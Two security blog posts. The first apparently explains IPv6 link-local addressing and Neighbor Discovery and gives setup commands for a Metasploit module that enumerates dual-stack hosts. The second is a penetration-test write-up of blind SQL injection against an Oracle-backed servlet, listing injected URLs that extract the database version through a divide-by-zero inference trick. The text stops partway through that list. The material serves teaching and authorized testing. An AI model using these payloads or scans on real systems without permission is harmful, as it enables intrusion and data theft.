Discovering Dual Stack Hosts with IP_MAP

IPv4 and IPv6 stacks can interoperate in order to make the v4 to v6 migration pretty smooth. Hence IPv4 hosts could run dual IP stack. Most firewalls with IPv6 support have separate rule-sets for IPv6 and IPv4.

Modern operating systems such as Linux have their IPv6 stack enabled by default and many system administrators are unaware of issues that may arise from employing both stacks. Common mistakes involve missing coordination between rule sets and access policies of different stacks. Linux provides builtin packet filtering capabilities in kernel spaces but unfortunately IPv4 ruleset defined with iptables are not coordinated on IPv6 stack without manually specifying IPv6 rules with iptables6. The same could be applied on ISO/OSI upper layers where access policies have been implemented on application side.


IPv6 Link-Local Address

IPv6 hosts automatically assign to each of their interfaces a unique address
based on the L2 address when no external source of network addressing information is available. These addresses refer only to a particular broadcast domain. Router will not forward datagrams using link-local addresses at all.

Link-local addresses have the prefix of FE80::/64. The last 64 bits of the IPv6 address is derived from the L2 address of related network adapter in such a way:
  • 0xFF and 0xFE are inserted between the third and fourt byte of mac-address
  • second low order bit of the first byte of MAC Address gets complemented
L2 Address 00:22:15:eb:19:4f gets IPv6 Link-local address fe80::222:15ff:feeb:194f


Neighbor Discovery Protocol

" IPv6 nodes on the same link use Neighbor Discovery to discover each other's presence, to determine each other's link-layer addresses, to find routers and to maintain reachability information about the paths to active neighbors. " RFC 2461

To determine the link-layer address of a neighbor an ICMPv6 Neighbor Solicitation is sent by a node. Solicited node answer with a ICMPv6 Neighbor Advertisement to announce it's link-layer address. As you guess ICMPv6 Neighbor Discover Protocol has replaced ARP in IPv4.

They replaced ARP to safely ensure Link Layer address translation. IPv6 header includes the AH header to authenticate the datagram. To this aim ICMPv6 gets encapsulated in IPv6 and AH extension neighbor spoofing should be avoided. It sounds like a novel in a perfect world to me but they still did it!


Solicited Node Address

In IPv4, the ARP Request frame is sent to the MAC-level broadcast, disturbing all nodes on the broadcast domain. For IPv6, instead of disturbing all IPv6 nodes on the local link , the solicited-node multicast address is used as the host destination for ICMPv6 Neighbor Solicitation message.

The solicited-node multicast address consists of the prefix FF02::1:FF00:0/104 and the last 24-bits of the IPv6 address that is being resolved. Node with link-local IPv6 address FE80::20B:6AFF:FE47:194F is listening for multicast traffic at the solicited-node address FF02::1:FF47:194F. Something similar happens at L2 where a multicast prefixed ethernet datagram with 33:33 is sent.


What is ip_map?

ip_map is an auxiliary module for Metasploit to be used for enumerating dual stack hosts. It means that it follows a two step process:


ARP sweep
For each target hosts refered by its IPv4 address it sends an arp-request claiming for the L2 Address. If host responds with arp-reply it's L2, L3 address get added to the array nodes


ICMPv6 ND sweep
For each elements of array nodes the L2 address component is extracted and used to get:
  • Solicited-Node multicast L2 address
  • Solicited-Node multicast L3 address
  • Node Link-local address

An ICMPv6 ND Solicitation packet is built and injected into the wire awaiting for corresponding ICMPv6 Neighbor Advertisement (if any).


How to ip_map?

Download msf trunk
svn co http://www.metasploit.com/svn/framework3/trunk /framework

Download and install pcaprub from rubyforge
svn co http://pcaprub.rubyforge.org/svn pcaprub
cd pcabrub
ruby extconf.rb && make && sudo make install

Download and install racket ( 1.0.7 at the moment of writing)
sudo gem install --source http://spoofed.org/files/racket racket

Create resource file for msf: ndpsweep.msf:
use auxiliary/scanner/discovery/ip_map
setg INTERFACE eth0
setg SHOST 192.168.2.100
setg SMAC 00:21:5d:61:7f:c0
setg RHOSTS 192.168.2.0/24
run
exit

Download and install ip_map
svn co http://msf-hack.googlecode.com/svn/trunk
cp ip_map.rb /framework/modules/auxiliary/scanner/discovery/

Start msf framework
sudo MSF_LOCAL_LIB=/var/lib/gems/1.8/gems/racket-1.0.7 ./msfconsole -r ./ndsweep.msf



Watch module in action

Blind SQL Injection: Inference through Underflow Error

About one year ago I was hired to perform a WAPT against a webportal. There was an eShop portlet composed by many servlets, one of which was used to obtain some discount by supplying a valid promotion code. Such a servlet returned a response page containing two different messages when a not valid promotion code had been inserted:

  • Not a valid promotion code

  • Error occurred please try later


The second message was returned when the supplied code contained some evil chars, such as a single quote, that probably raised an error on the Backend DBMS. Unfortunately there was a proper Error Handling policy catching the exception and avoiding code backtrace on the response page. It looked like the servlet was vulnerable to Blind SQL Injection.

Recalling my contributions to the OWASP Backend Security Project, i used some techniques I had previously developed to fingerprint a DBMS by injecting some evil statements containing string concatenation and SQL dialect.

After a deep fuzzing and body response analisys I found that Not a valid promotion code was triggered by the following URLs:

/codeValidator.jsp?code=wrong
/codeValidator.jsp?code=wr' || 'ong
/codeValidator.jsp?code=wr' || (SELECT 'o' FROM DUAL) || 'ng
/codeValidator.jsp?code=wr' || (SELECT SUBSTR('oo', 1, 1) FROM DUAL) || 'ng


Error occurred please try later was triggered by the following URLs:

/codeValidator.jsp?code=wrong'
/codeValidator.jsp?code=wr'ng
/codeValidator.jsp?code=wr' || (SELECT 1/0 FROM DUAL) || 'ng

They both confirmed a SQL Injection vulnerability and gave away Oracle as the backend DBMS. Unfortunately, I didn't have a valid promotion code, so what kind of tautology was I supposed to use?

The answer I found was:

  • Raise an underflow exception if and only if the tautology is FALSE

  • Analyze what message is returned to guess if underflow exception occours



To this end I set up an inference procedure using the PL/SQL function INSTR. INSTR returns the index of the first occourrence of a char in a string, if the string contains such a char or 0. It means that INSTR follow this behaviour when used in conjuction of SUBSTR and 1/0 expression:


SELECT 1/INSTR(SUBSTR('daniele',1,1), 'd') FROM DUAL => 1
SELECT 1/INSTR(SUBSTR('daniele',1,1), 'z') FROM DUAL => Underflow Exception


It was easy to deduce inference procedure. These query strings returned Not a valid promotion code:


?code=test' || (SELECT 1/INSTR(SUBSTR(version,1,1),'9') FROM v$instance) || '
?code=test' || (SELECT 1/INSTR(SUBSTR(version,2,1),'.') FROM v$instance) || '
?code=test' || (SELECT 1/INSTR(SUBSTR(version,3,1),'2') FROM v$instance) || '
?code=test' || (SELECT 1/INSTR(SUBSTR(version,4,1),'.') FROM v$instance) || '
?code=test' || (SELECT 1/INSTR(SUBSTR(version,5,1),'0') FROM v$instance) || '
?code=test' || (SELECT 1/INSTR(SUBSTR(version,6,1),'.') FROM v$instance) || '
?code=test' || (SELECT 1/INSTR(SUBSTR(version,7,1),'8') FROM v$instance) || '
?code=test' || (SELECT 1/INSTR(SUBSTR(version,8,1),'.') FROM v$instance) || '
?code=test' || (SELECT 1/INSTR(SUBSTR(version,9,1),'0') FROM v$instance) || '


While these query strings returned Error occurred please try later

?code=wrong' || (SELECT 1/INSTR(SUBSTR(version,1,1),'8') FROM v$instance) || '
?code=wrong' || (SELECT 1/INSTR(SUBSTR(version,2,1),',') FROM v$instance) || '
?code=wrong' || (SELECT 1/INSTR(SUBSTR(version,3,1),'3') FROM v$instance) || '